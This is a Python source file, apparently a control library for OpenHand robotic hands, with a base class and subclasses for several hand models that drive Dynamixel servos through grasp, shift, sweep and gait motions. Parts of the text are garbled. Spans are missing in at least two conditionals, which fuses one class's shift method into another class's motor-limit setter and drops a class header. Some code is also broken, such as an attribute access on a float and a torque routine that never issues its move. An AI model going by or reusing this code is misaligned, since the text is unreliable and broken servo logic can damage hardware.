Decimal\n\n#Assumptions:\n\t#only dynamixel servos being used\n\t#either all RX or MX servos being used (no mixing)\n\t#different encoder limits for each type\n\t\t#motor limits and mov't designated in terms of proportion, not encoder value\n\n\nclass OpenHand():\n\tdyn = None\t\t#USB2Dynamixel device\n\tport = None\t\t#mounted port, /devttyUSB# in Linux, COM# in Windows\n\tservo_ids = []\n\tservos = []\n\n\tservo_speed = 1.0\n\tmax_torque = 0.4\t#Dynamixel suggests capping max torque at 0.4 of stall torque\n\n\tmotorDir = []\n\tmotorMin = []\n\tmotorMax = []\n\tmodes = []\t\t#position control (True) or torque/pseudo-torque control (False)\n\n\tamnt_release = 0.0\t#values [0,1.0] for degree of closing and opening\n\tamnt_close = 0.5\n\n\tpause = 0.3\t\t#amount of time to wait for move commands and eeprom updates\n\n\tHAND_HEIGHT = 0.14\t#hand height from base to palm (m) used for arm IK and approach vectors\n\tWRIST_OFFSET = -np.pi/3\t#J5 offset (rad) to accommodate final orientation\n\n\tdef __init__(self,port,servo_ids,series=\"RX\"):\n\t\tself.port = port\n\t\tself.dyn = USB2Dynamixel_Device(port)\t#always only one\n\t\tself.servo_ids = servo_ids\n\t\tnum_servos = len(servo_ids)\n\n\t\tprint( \"Initializing...\")\n\t\tself.servos = []\n\t\tfor servo_id in self.servo_ids:\n\t\t\tif series == \"RX\" or series ==\"MX\":\n\t\t\t\tself.servos.append(Robotis_Servo(self.dyn,servo_id,series))\n\t\t\telse: #We will be using protocol 2 instead\n\t\t\t\tself.servos.append(Robotis_Servo_X(self.dyn,servo_id,series))\n\n\t\t\tprint( \"Adding servo id \"+repr(servo_id))\n\t\t\ttime.sleep(self.pause)\n\t\tfor servo in self.servos:\n\t\t\tservo.kill_cont_turn()\t\t#make sure position mode limits are enabled\n\n\t\t\ttime.sleep(self.pause)\t\t#in case eeprom delay is what is causing the issues\n\t\t\tif series == \"RX\":\n\t\t\t\tservo.apply_speed(1)\n\t\t\ttime.sleep(self.pause)\n\t\t\tservo.apply_max_torque(self.max_torque)\n\t\tself.modes = [True]*num_servos\t\t#default assignment (shouldn't have servos in torque mode during normal operation)\n\n\t\tif len(self.motorDir)!=num_servos or len(self.motorMin)!=num_servos or len(self.motorMax)!=num_servos:\n\t\t\tprint( \"[ERR] Servo number mismatch, resetting motor limits\")\n\t\t\tself.motorDir = [1]*num_servos\n\t\t\tself.motorMin = [self.amnt_release]*num_servos\n\t\t\tself.motorMax = [self.amnt_close]*num_servos\n\n\t\tif num_servos == 4: #This is the model_O and we want to prevent gear shear\n\t\t\tfor i in range(num_servos):\n\t\t\t\tenc = self.servos[i].read_encoder()\n\t\t\t\tif series == \"RX\":\n\t\t\t\t\tif (self.motorDir[i] ==1 and enc > 512) or (self.motorDir[i] == -1 and enc < 512):\n\t\t\t\t\t\tprint( \"------------FAILSAFE-------------\")\n\t\t\t\t\t\tprint( \"Failsafe is incorporated to prevent gear shear in Model O\")\n\t\t\t\t\t\tprint( \"Motor encoder postion: \", enc)\n\t\t\t\t\t\tinput = raw_input(\"Your encoder position for motor index \" + str(i) + \" may cause the motor to move backwards and break gears. We recommend you resetting the fingers to prevent gear shear, proceed? [ENTER]\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint( \"Motor directions not set...\")\n\t\t\t\t#These would then be the MX and XM motors\n\t\t\t\telif (self.motorDir[i] ==1 and enc > 2048) or (self.motorDir[i] == -1 and enc < 2048):\n\t\t\t\t\tprint( \"------------FAILSAFE-------------\")\n\t\t\t\t\tprint( \"Failsafe is incorporated to prevent gear shear in Model O\")\n\t\t\t\t\tprint( \"Motor encoder postion: \", enc)\n\t\t\t\t\tinput = raw_input(\"As an XM Motor, we can automatically fix this issue for motor \" + str(i) + \", proceed? [ENTER]\")\n\t\t\t\t\tself.servos[i].enable_extended_position_control_mode()\n\t\t\t\t\tself.servos[i].move_to_encoder(self.servos[i].settings['max_encoder']+100)\n\t\t\t\t\ttime.sleep(self.pause)\n\t\t\t\t\tself.servos[i].disable_extended_position_control_mode()\n\t\t\t\t\ttime.sleep(self.pause)\n\t\t\t\t\tprint( \"Fixed servo from ID: \"+repr(servo_ids[i]))\n\t\t\t#Finally, limit the abduction_torque if desired\n\t\t\tif self.abduction_limit !=1:\n\t\t\t\tself.servos[0].enable_current_position_control_mode(self.abduction_limit)\n\n\t\ttime.sleep(self.pause)\n\t\tself.reset()\n\t\tprint( \"Initialization Complete.\")\n\n\tdef reset(self):\t#returns everything to zeroed positions, different from release\n\t\tprint( \"[ERR] reset() not implemented\")\n\t\treturn False\n\n\tdef release(self):\t#opens the finger components, doesn't necessarily move non-finger servos\n\t\tprint( \"[ERR] release() not implemented\\n\")\n\t\treturn False\n\t#close functions are normalized regardless of mode such that the operating range [0,1.0] makes sense\n\tdef close(self,amnt=0.5):\n\t\tprint( \"[ERR] close() not implemented\\n\")\n\t\treturn False\n\t#tval: torque applied to servos, dpos: delta position overshoot beyond current\n\tdef close_torque(self,tval=0.2,dpos=1.0):\n\t\tprint( \"[ERR] close_torque() not implemented\\n\")\n\t\treturn False\n\t#difference between close_torque should just be the particular servos that are actuated\n\tdef _close_torques(self,tval=0.2,dpos=1.0,idxs=None):\n\t\tif idxs is None:\t#effect on all servos if id's not specified\n\t\t\tidxs = range(len(self.servos))\n\t\thp,he = self.readHand()\n\t\tfor idx in idxs:\n\t\t\tself.torqueMotor(idx,tval,hp[idx]+dpos)\n\t\ti=0\n\t\twhile i<15:\t\t#some arbitrary limit on torque closing\n\t\t\tfor idx in idxs:\n\t\t\t\tif not self.servos[idx].is_moving():\n\t\t\t\t\tamnt,enc = self.readMotor(idx)\n\t\t\t\t\tself.moveMotor(idx,amnt)\t#exit out of torque mode\n\t\t\ttime.sleep(self.pause)\n\t\t\ti+=1\n\t\tself.hold()\n\n\n\t#move servo according to amnt, not encoder value, scaled between designated min/max values\n\tdef moveMotor(self,index,amnt):\n\t\tif amnt < 0. or amnt > 1.0:\n\t\t\tprint( \"[WARNING] motion out of bounds, capping to [0,1]. Index: \"+repr(index)+\", Cmd:\"+repr(amnt))\n\t\tamnt = min(max(amnt,0.),1.0)\n\t\tif (index < 0 or index >= len(self.servos)):\n\t\t\tprint( \"[ERR] invalid motor index \"+repr(index))\n\t\telse:\n\t\t\tservo = self.servos[index]\n\n\t\t\tif self.motorDir[index]>0:\t#normal case\n\t\t\t\tservo.move_to_encoder(int(servo.settings[\"max_encoder\"]*(self.motorMin[index] + amnt*(self.motorMax[index]-self.motorMin[index]))))\n\t\t\telse:\t\t\t\t#reverse\n\t\t\t\tservo.move_to_encoder(int(servo.settings[\"max_encoder\"]*(self.motorMax[index] - amnt*(self.motorMax[index]-self.motorMin[index]))))\n\n\t\t\tif not self.modes[index]:\t#restore position-control mode if necessary - want to register new encoder target first before re-applying system torque\n\t\t\t\tself.modes[index] = True\n\t\t\t\tservo.apply_max_torque(self.max_torque)\n\n\tdef getCurrDir(self):\n\t\tglobal currdir, take_no\n\t\tprint( 'Current directory: ')\n\t\tcurrdir = raw_input()\n\t\tprint( 'Take number: ')\n\t\ttake_no = raw_input()\n\n\n\tdef torqueMotor(self,index,val,pos_val=None):\n\t\tval = min(1.0,max(val,0))\t#by design, can exceed default max torque value\n\t\tself.modes[index] = False\t#swap to torque mode in record keeping\n\t\ts = self.servos[index]\n\t\tif pos_val is None:\n\t\t\tenc = s.settings['max_encoder']\n\t\telse:\n\t\t\tpos_val = min(max(0,pos_val),1.0) #new target position is always max to force saturation of servo torque\n\t\t\tenc = int((pos_val * (self.motorMax[index]-self.motorMin[index])+self.motorMin[index]) * s.settings['max_encoder'])\n\n\t\ts.apply_max_torque(val)\n\t\ts.move_to_encoder(enc)\n\n\tdef moveHand(self,vals):\n\t\tif len(vals)!=len(self.servos):\n\t\t\tprint( \"[ERR] Motor number mismatch\")\n\t\telse:\n\t\t\tfor i in range(len(vals)):\n\t\t\t\tself.moveMotor(i,vals[i])\n\n\t#returns motor position amnt, between designated min and max values\n\tdef readMotor(self,index):\n\t\tservo = self.servos[index]\n\t\tenc = servo.read_encoder()\n\t\tif self.motorDir[index]>0:\n\t\t\tval = (enc/float(servo.settings[\"max_encoder\"])-self.motorMin[index]) / (self.motorMax[index]-self.motorMin[index])\n\t\telse:\n\t\t\tval = (self.motorMax[index]-enc/float(servo.settings[\"max_encoder\"])) / (self.motorMax[index]-self.motorMin[index])\n\t\treturn val,enc\n\n\n\tdef readLoads(self):\n\t\tfor servo in self.servos:\n\t\t\tprint( \"---\")\n\t\t\tprint( \"Servo ID: \"+repr(servo.servo_id))\n\t\t\tprint( \"Load: \"+repr(servo.read_load()))\n\n\tdef readMotorMins(self):\n\t\tindex=0\n\t\tfor servo in self.servos:\n\t\t\tprint( \"---\")\n\t\t\tprint( \"Servo ID: \"+repr(servo.servo_id))\n\t\t\tprint( \"Motor Mins: \"+ repr(self.motorMin[index]))\n\t\t\tindex=index+1\n\n\tdef readHand(self):\n\t\tamnts = np.array([0.]*len(self.servos))\n\t\tencs = np.array([0]*len(self.servos))\n\n\t\tfor i in range(len(self.servos)):\n\t\t\tamnt,enc = self.readMotor(i)\n\t\t\tamnts[i] = amnt\n\t\t\tencs[i] = enc\n\n\t\treturn amnts, encs\n\n\t#takes the current location and sets either the min or max\n\tdef setMotorMin(self):\n\t\tamnts,encs = self.readHand()\n\t\tself.motorMin = (encs/float(self.servos[0].settings['max_encoder'])).tolist()\n\tdef setMotorMax(self):\n\t\tamnts,encs = self.readHand()\n\t\tself.motorMax = (encs/float(self.servos[0].settings['max_encoder'])).tolist()\n\n\t#setting the max torque (shortcut for torque-based closing motions)\n\tdef setMaxTorque(self,val=0.4):\n\t\tval = max(min(1.0,val),0.1)\n\t\tfor servo in self.servos:\n\t\t\tservo.apply_max_torque(val)\n\t\t\ttime.sleep(self.pause)\t#helps mitigate eeprom delay issues?\n\t\tself.max_torque = val\n\n\tdef setServoSpeed(self,val=1.0):\n\t\tval = max(min(1.0,val),0.1)\n\t\tfor servo in self.servos:\n\t\t\tservo.apply_speed(val)\n\t\t\ttime.sleep(self.pause)\n\t\tself.servo_speed = val\n\n\t#moves to the current encoder value and locks servos in place to minimize current draw\n\tdef preventAllLoadErrors(self,offset_scale = 0):\n\t\tfor i in range(len(self.servos)):\n\t\t\tself.preventLoadError(i,offset_scale)\n\tdef preventLoadError(self,i,offset_scale = 0):\n\t\tif abs(self.servos[i].read_load()) > 80:\t#arbitrary load threshold\n\t\t\tvalue = offset_scale*10 + self.servos[i].read_encoder()\t#should never be negative\n\t\t\tif value < self.servos[i].settings['max_encoder']:\n\t\t\t\tself.servos[i].move_to_encoder(value)\n\t\t\telse:\n\t\t\t\tif value < 0:\n\t\t\t\t\tself.servos[i].move_to_encoder(0)\n\t\t\t\telse:\n\t\t\t\t\tself.servos[i].move_to_encoder(self.servos[i].settings['max_encoder'])\n\t#move to the current position for each motor - fast switch from torque mode and alternative to preventAllLoadErrors\n\tdef hold(self):\n\t\tfor i in range(len(self.servos)):\n\t\t\tamnt, enc = self.readMotor(i)\n\t\t\tself.moveMotor(i,amnt)\n\n\tdef diagnostics(self):\n\t\tfor servo in self.servos:\n\t\t\tprint( \"---\")\n\t\t\tprint( \"Servo ID: \"+repr(servo.servo_id))\n\t\t\tprint( \"Load: \"+repr(servo.read_load()))\n\t\t\tprint( \"Temperature: \"+repr(servo.read_temperature()))\n\t\t\tprint( \"Target Encoder: \"+repr(servo.read_target_encoder()))\n\t\t\tprint( \"Current Encoder: \"+repr(servo.read_encoder()))\n\n\n#------------------------------------------------------#\n\n#Different hand types\n\n#------------------------------------------------------#\n\nclass GR2(OpenHand):\n\tmotorDir = [1,1]\n\tmotorMin = [0.05,0.05]\t#should always be symmetric here?\n\tmotorMax = [0.7,0.7]\n\n\tHOLD_TORQUE = 0.2\n\tOVERSHOOT = 0.15\n\n\tpause = 0.2\n\n\tdef __init__(self,port=\"/dev/ttyUSB0\",s1=1,s2=2,dyn_model=\"MX\"):\n\t\tOpenHand.__init__(self,port,[s1,s2],dyn_model)\n\n\tdef reset(self):\n\t\tself.release()\n\tdef release(self):\n\t\tself.moveMotor(0,self.amnt_release)\n\t\tself.moveMotor(1,self.amnt_release)\n\tdef close(self,amnt=0.3):\n\t\tself.moveMotor(0,amnt)\n\t\tself.moveMotor(1,amnt)\n\t#replacement for preventAllLoadErrors() due to servo state constraints\n\tdef hold(self):\n\t\tfor i in range(2):\n\t\t\tamnt,enc = self.readMotor(i)\n\t\t\tself.moveMotor(i,amnt)\t#accounts for possible transition from torque mode\n\t#tval: torque value\n\t#dpos: delta in position from current (may force operation into compliance region)\n\tdef close_torque(self,tval=None,dpos=1.0):\n\t\tif tval is None:\n\t\t\ttval = self.HOLD_TORQUE\n\t\tself._close_torques(tval,dpos)\n\n\t#demo motion that moves object back and forth with shift (assumes symmetry in operation)\n\tdef sweep(self,val):\n\t\tamnts,encs = self.readHand()\t#record starting pose to return to\n\t\tself.shift(0,val)\n\t\ttime.sleep(self.pause)\n\t\tself.shift(1,val)\n\t\ttime.sleep(self.pause*3)\n\t\tself.shift(0,amnts[0])\n\t\ttime.sleep(self.pause)\n\t\tself.shift(0,amnts[1])\n\t\ttime.sleep(self.pause)\n\t\tself.moveHand(amnts)\n\n\t#assumes operation starts with grasp w/ full contact\n\t\t#either pushing or relaxing a finger towards a desired position\n\tdef shift(self,index,val):\n\t\tother_index = (index+1)%2\n\t\tvals,encs = self.readHand()\n\n\t\tif val= len(self.servos)):\n\t\t\tprint( \"[ERR] invalid motor index \"+repr(index))\n\t\telse:\n\t\t\tif (index >0):\n\t\t\t\tself.motorMin[index]=val\n\t\t\t\tself.motorMax[index]=val+self.max_close\n\t\t\telse:\t#case of the adduction motor\n\t\t\t\tself.motorMin[index]=val\n\t\t\t\tself.motorMax[index]=val+0.5\n\t\t\tself.reset()\n\t\t\tprint( 'Index changed successfully...')\n\n\t#abduct/adduct fingers - if no param given, move to power grasp\n\tdef adduct(self,amnt=1):\n\t\tself.moveMotor(0,amnt)\n\n \t#abduct fingers - then pinch close\n\tdef pinch_close(self,amnt=0.4):\n\t\tadduct_loc, enc = self.readHand()\n\t\tif(adduct_loc[0] > 0.05):\n\t\t\tself.reset()\n\t\t\ttime.sleep(1.5) #pause for 1.5 seconds to allow reset\n\t\tself.moveMotor(1,amnt)\n\t\tself.moveMotor(2,amnt)\n\n\t#adduct fingers - then power close\n\tdef power_close(self,amnt=0.6):\n\t\tadduct_loc, enc = self.readHand()\n\t\tif(adduct_loc[0] < 0.95):\n\t\t\tself.release()\n\t\t\ttime.sleep(1) #pause for 1 second to allow release\n\t\t\tself.adduct(1) #move fingers facing thumb\n\t\t\ttime.sleep(1)\n\t\tself.close(amnt)\n\n \t#Example why torque control is required for fingertip manipulation\n\tdef pinch_object_move(self,delta_amnt=0.03, left=True, down = False): #These cannot be the same or else we will move diagonal\n\t\tadduct_loc, enc = self.readHand()\n\t\tif(adduct_loc[0] > 0.05):\n\t\t\tprint( '[ERR] Hand is not in a pinch grasp')\n\t\t\treturn\n\t\telse:\n\t\t\tlocs, enc = self.readHand()\n\t\t\tif left==True and down == False:\t\t#move left\n\t\t\t\tself.moveMotor(1,locs[1]+delta_amnt)\n\t\t\t\tself.moveMotor(2,locs[2]-delta_amnt)\n\t\t\telif left==False and down == False: \t\t#move right\n\t\t\t\tself.moveMotor(1,locs[1]-delta_amnt)\n\t\t\t\tself.moveMotor(2,locs[2]+delta_amnt)\n\t\t\telif left==False and down == True: \t\t#move down\n\t\t\t\tself.moveMotor(1,locs[1]+delta_amnt)\n\t\t\t\tself.moveMotor(2,locs[2]+delta_amnt)\n\t\t\telse: \t\t\t\t\t\t#move up\n\t\t\t\tself.moveMotor(1,locs[1]-delta_amnt)\n\t\t\t\tself.moveMotor(2,locs[2]-delta_amnt)\n\n\t#replacement for preventAllLoadErrors() due to servo state constraints\n\tdef hold(self):\n\t\tfor i in [1,2]:\n\t\t\tamnt,enc = self.readMotor(i)\n\t\t\tself.modes[i] = True\n\t\t\tself.servos[i].apply_max_torque(self.max_torque)\n\t\t\tself.moveMotor(i,amnt+0.025)\t#accounts for possible transition from torque mode\n\n\t#tval: torque value\n\t#dpos: delta in position from current (may force operation into compliance region)\n\tdef close_torque(self,tval=None,dpos=1.0):\n\t\tif tval is None:\n\t\t\ttval = self.HOLD_TORQUE\n\t\tself._close_torques(tval,dpos)\n\n\t#Sets the motor into a torque mode so that fingertip manipulation is possible\n\tdef torqueMotor(self,index,val,pos_val=None):\n\t\tval = min(1.0,max(val,0))\t#by design, can exceed default max torque value\n\t\tself.modes[index] = False #turn into torque mode\n\t\ts = self.servos[index]\n\t\tif pos_val is None:\n\t\t\tenc = int(s.read_encoder()+self.OVERSHOOT * s.settings['max_encoder'])\n\t\telse:\n\t\t\tpos_val = min(max(0,pos_val),1.0)\n\t\t\tenc = int((pos_val * (self.motorMax[index].modes-self.motorMin[index])+self.motorMin[index]) * s.settings['max_encoder'])\n\n\t\ts.apply_max_torque(val)\n\n \t#assumes operation starts with grasp w/ full contact\n\t#either pushing or relaxing a finger\n\t#shifts object to the edge of the workspace\n\tdef shift(self,index,val, wait_range=None):\n\t\tif index != 1 and index !=2:\n\t\t\tprint( \"[ERR] Can only shift using power grasp with opposing fingers 1 and 2\")\n\t\t\treturn\n\n\t\tother_index=1\n\t\tif (index == 1):\n\t\t\tother_index=2\n\t\tvals,encs = self.readHand()\n\n\t\tif val 0.05):\n\t\t\tprint( '[ERR] Hand must be in pinch_close mode before sweep')\n\t\t\treturn\n\n\t\tamnts,encs = self.readHand() #record starting pose to return to\n\t\tif val == None:\n\t\t\tval=amnts[1]+0.10\n\t\tself.shift(1,val,7)\n\t\ttime.sleep(0.5)\n\t\tself.shift(2,val,14)\n\t\ttime.sleep(0.5)\n\t\tself.shift(1,val-0.05,12)\n\t\ttime.sleep(0.5)\n\t\tself.shift(2,val-0.05,12)\n\t\ttime.sleep(0.5)\n\t\tself.shift(1,amnts[1],10)\n\t\ttime.sleep(self.pause)\n\t\tprint( \"Sweep Completed..\")\n\n\t#jiggling the fingers closed\n\tdef close_jiggle(self,amnt=0.5,da=0.05,nsteps=5,pause=0.25):\n\t\tamnt_start,amnt_enc = self.readHand()\n\t\ts_amnt = amnt_start[0]\n\t\tif s_amnt<0.5:\n\t\t\tprint( \"[WARNING] Fingers may be spread too far apart for closing motion\")\n\t\t\tprint( \"Consider moving fingers to adduction value of greater than 0.5\")\n\n\t\tamnt_goal = np.array([amnt,amnt,amnt,s_amnt])\n\t\tda_arr = np.array([da,-da,0.,0.])\n\t\tfor i in range(nsteps):\n\t\t\tamnt_curr=self.readHand()\n\t\t\tamnt_arr = amnt_start+(amnt_goal-amnt_curr)*float(i)/nsteps+da_arr*(-1)**i\n\n\t\t\tself.moveHand(amnt_arr)\n\t\t\ttime.sleep(pause)\n\t\tself.moveHand(amnt_goal)\n\n\nclass Model_T42(OpenHand):\n\tservo_speed = 0.25\n\tmax_torque = 1\n\tmodes = [True, True] #True if in position control\n\n\tmax_close = 0.75\n\tmotorDir = [1,1]\n\tmotorMin = [0.05,0.05]\n\tmotorMax = [motorMin[0]+max_close,motorMin[1]+max_close]\n\n\tHAND_HEIGHT = 0.08\n\tWRIST_OFFSET = -5*np.pi/12\n\n\tdef __init__(self,port=\"/dev/ttyUSB0\",s1=1,s2=2,dyn_model=\"RX\", s1_min = motorMin[0], s2_min = motorMin[1]):\n\t\t#s1: \"forefinger\"\n\t\t#s2: \"thumb\"\n\t\tmot_offset = [s1_min,s2_min]\n\n\t\tif(mot_offset != self.motorMin): #update motor mins if initialized to different values\n\t\t\tprint( 'Setting new motor minimums... ')\n\t\t\tself.motorMin = mot_offset\n\t\t\tself.motorMax = [self.motorMin[0]+self.max_close,self.motorMin[1]+self.max_close]\n\n\t\tOpenHand.__init__(self,port,[s1,s2],dyn_model)\n\n\t#default OpenHand commands:\n\tdef reset(self):\n\t\tself.release()\n\n\tdef close(self,amnt=0.45):\t#position-based closing mechanism\n\t\tself.moveMotor(0,amnt)\n\t\tself.moveMotor(1,amnt)\n\n\tdef change_motor_min(self,index, val):\n\t\tif (index < 0 or index >= len(self.servos)):\n\t\t\tprint( \"[ERR] invalid motor index \"+repr(index))\n\t\telse:\n\t\t\tself.motorMin[index]=val\n\t\t\tself.motorMax[index]=val+self.max_close\n\n\t\t\tself.reset()\n\t\t\tprint( 'Index changed successfully...')\n\n\tdef followTrajectory(self):\t#position-based closing mechanism\n\t\tact1inputs = np.array([0.6777,0.6854,0.6820,0.6762,0.6705,0.6531,0.6363,0.6256,0.6162,0.6053,0.6012,0.5963,0.5935,0.5905,0.5888,0.5864,0.5846,0.5815,0.5782,0.5729,0.5654,0.5555,0.5467,0.5381,0.5317,0.5283,0.5274,0.5272,0.5271,0.5232,0.5179,0.5077,0.4962,0.4845,0.4764,0.4695,0.4669,0.4654,0.4624,0.4589,0.4556,0.4527,0.4502,0.4493,0.4491,0.4490,0.4490,0.4490,0.4490,0.4490])\n\t\tact2inputs = np.array([0.6629,0.6726,0.6733,0.6751,0.6788,0.6784,0.6780,0.6791,0.6796,0.6753,0.6741,0.6728,0.6722,0.6717,0.6716,0.6717,0.6722,0.6726,0.6738,0.6751,0.6756,0.6754,0.6758,0.6758,0.6784,0.6818,0.6855,0.6858,0.6858,0.6827,0.6792,0.6762,0.6761,0.6759,0.6728,0.6675,0.6617,0.6560,0.6522,0.6514,0.6524,0.6533,0.6535,0.6520,0.6504,0.6497,0.6492,0.6491,0.6490,0.6490])\n\n\t\tself.moveMotor(0,0.15)\n\t\tself.moveMotor(1,0.31)\n\n\t\ttime.sleep(1)\n\n\t\tfor i in range(len(act1inputs)):\n\t\t\ttime.sleep(0.25)\n\t\t\tprint( \"thumb: %.2f\" % Decimal(act1inputs[i]*(0.50-0.15)+0.05))\n\t\t\tprint( \"2-link: %.2f\" % Decimal(act2inputs[i]*(0.65-0.10)+0.05))\n\t\t\tself.moveMotor(1,act1inputs[i]*(0.50-0.15)+0.) #1 link\n\n\t\t\ttime.sleep(0.05)\n\t\t\tself.moveMotor(0,act2inputs[i]*(0.65-0.10)+0.05) #2 link\n\n\t\t\t#gaitHand(self,vals,num=5,overshoot=0.5,release=True)\n\n\tdef shootOutRight(self,shift_amnt=0.4,close_amt=0.25):\n\t\tself.release()\n\t\ttime.sleep(1)\n\t\tself.moveMotor(0,shift_amnt)\n\t\ttime.sleep(1)\n\t\tself.close(close_amt-0.10)\n\t\ttime.sleep(1)\n\t\tself.close(close_amt)\n\n\tdef shootOutLeft(self,shift_amnt=0.37,close_amt=0.3):\n\t\tself.release()\n\t\ttime.sleep(1)\n\t\tself.moveMotor(1,shift_amnt)\n\t\ttime.sleep(1)\n\t\tself.close(close_amt)\n\n\tdef close_pause(self, amnt=0.45): # position-based closing mechanism\n\t\tself.moveMotor(0, amnt)\n\t\tself.moveMotor(1, amnt)\n\t\ttime.sleep(self.pause)\n\n\tdef release(self):\n\t\tself.moveMotor(0,self.amnt_release)\n\t\tself.moveMotor(1,self.amnt_release)\n\n\t#model-specific OpenHand commands:\n\tdef flip_init(self):\n\t\tself.moveMotor(0,self.amnt_release)\n\t\tself.moveMotor(1,self.amnt_close)\n\n\tdef move_right(self,val,close_amnt):\n\t\t#self.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2) #time to settle\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tself.moveMotor(0,amnt + val)\n\t\t\tself.moveMotor(1,amnt - val)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\t#self.saveActVals()\n\n\tdef gait_right(self, val, num, close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2) # time to settle\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tinc = val/num\n\t\t\tfor i in range(0,num):\n\t\t\t\tself.moveMotor(1, amnt - i*inc)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\t\tself.moveMotor(0, amnt + i * inc)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\tdef move_left(self,val,close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tself.moveMotor(1, amnt + val)\n\t\t\tself.moveMotor(0, amnt - val)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\tdef gait_left(self, val, num,close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2) # time to settle\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tinc = val / num\n\t\t\tfor i in range(0, num):\n\t\t\t\tself.moveMotor(1, amnt + i * inc)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\t\tself.moveMotor(0, amnt - i * inc)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\tdef pull_in(self,val1,val2,close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0, 1):\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tself.moveMotor(1, amnt - val2)\n\t\t\tself.moveMotor(0,amnt + val1)\n\t\t\t#time.sleep(self.pause * 2)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\tdef gait_in(self, val1, val2, num,close_amnt):\n\t\tself.getCurrDir()\n\t\tfor i in range(0,1):\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tamnt, enc = self.readMotor(1)\n\t\t\tinc2 = val2 / num\n\t\t\tinc1 = val1 / num\n\t\t\tfor i in range(0, num):\n\t\t\t\tself.moveMotor(1, amnt - inc2 * i)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\t\tself.moveMotor(0, amnt + inc1 * i)\n\t\t\t\ttime.sleep(self.pause)\n\t\t\t# time.sleep(self.pause * 2)\n\t\t\ttime.sleep(self.pause * 2)\n\t\t\tself.close(close_amnt)\n\t\tself.saveActVals()\n\n\n\tdef move_out(self): #questionable if this could even work\n\t\ttime.sleep(self.pause * 2)\n\t\tamnt, enc = self.readMotor(1)\n\t\tfor i in range (1,11):\n\n\t\t\t#move_right\n\t\t\ttime.sleep(self.pause) # time to settle\n\t\t\tself.moveMotor(0, amnt + 0.01*i)\n\t\t\tself.moveMotor(1, amnt - 0.01*i)\n\t\t\t#move_left\n\t\t\ttime.sleep(self.pause)\n\t\t\tself.moveMotor(0, amnt - 0.01*i)\n\t\t\ttime.sleep(self.pause)\n\t\t\tself.moveMotor(1, amnt + 0.01*i)\n\t\ttime.sleep(self.pause * 2)\n\n\tdef flip_close(self):\n\t\tself.moveMotor(0,self.amnt_close)\n\t\tself.moveMotor(1,self.amnt_close)\n\n\n\t# demo motion that moves object back and forth with shift (assumes symmetry in operation)\n\tdef sweep(self, val):\n\t\tamnts, encs = self.readHand() # record starting pose to return to\n\t\tself.shift(0, val)\n\t\ttime.sleep(self.pause)\n\t\tself.shift(1, val)\n\t\ttime.sleep(self.pause * 3)\n\t\tself.shift(0, amnts[0])\n\t\ttime.sleep(self.pause)\n\t\tself.shift(0, amnts[1])\n\t\ttime.sleep(self.pause)\n\t\tself.moveHand(amnts)\n\n\n\t# assumes operation starts with grasp w/ full contact\n\t# either pushing or relaxing a finger towards a desired position\n\tdef shift(self, index, val):\n\t\tother_index = (index + 1) % 2\n\t\tvals, encs = self.readHand()\n\n\t\tif val < vals[index]:\n\t\t\tself.torqueMotor(index, 0.)\n\t\t\tself.moveMotor(other_index, vals[other_index] + (vals[index] - val))\n\t\telse:\n\t\t\tself.torqueMotor(other_index, 0.)\n\t\t\tself.moveMotor(index, val)\n\n\t\ti = 0\n\t\twhile i < 10: # arbitrary step count to 10 as system settles\n\t\t\ts_val, s_enc = self.readMotor(index)\n\t\t\ts_val_err = abs(s_val - val)\n\t\t\tprint( \"Shifting error: \" + repr(round(s_val_err, 4)))\n\t\t\tif s_val_err < 0.01:\n\t\t\t\tbreak\n\t\t\ttime.sleep(self.pause)\n\t\t\ti += 1\n\n\t\tprint( \"Final shift error: \" + repr(round(s_val_err, 4)))\n\t\tself.hold()\n\t\treturn s_val_err\n\nclass Model_T(OpenHand):\n\tmax_torque = 0.4\n\tlimit_close = 10\t\t#counter for a standard close (to prevent servo stuck in closing mode in event of tendon failure)\n\n\tmodes = [True]\n\n\tmax_close = 0.75\n\tmotorDir = [1]\n\tmotorMin = [0.05]\n\tmotorMax = [motorMin[0]+max_close]\n\n\tHAND_HEIGHT = 0.14\n\tWRIST_OFFSET = -np.pi/4\n\n\tdef __init__(self,port=\"/dev/ttyUSB0\",s1=1,dyn_model=\"MX\", s1_min = motorMin[0]):\n\n\t\tmot_offset = [s1_min]\n\t\tif(mot_offset != self.motorMin): #update motor mins if initialized to different values\n\t\t\tprint( 'Setting new motor minimums... ')\n\t\t\tself.motorMin = mot_offset\n\t\t\tself.motorMax = [self.motorMin[0]+self.max_close]\n\n\t\tOpenHand.__init__(self,port,[s1],dyn_model)\n\n\tdef reset(self):\n\t\tself.moveMotor(0,self.amnt_release)\n\n\t#may exceed encoder limit, especially depending on the servo used\n\tdef close_torque(self,amnt=0.5):\n\t\tself.servos[0].enable_torque_mode()\n\t\tself.servos[0].apply_torque(amnt*self.max_torque)\n\t\ttime.sleep(self.pause*2)\n\n\t\ti,sp = 0,1.\n\t\twhile 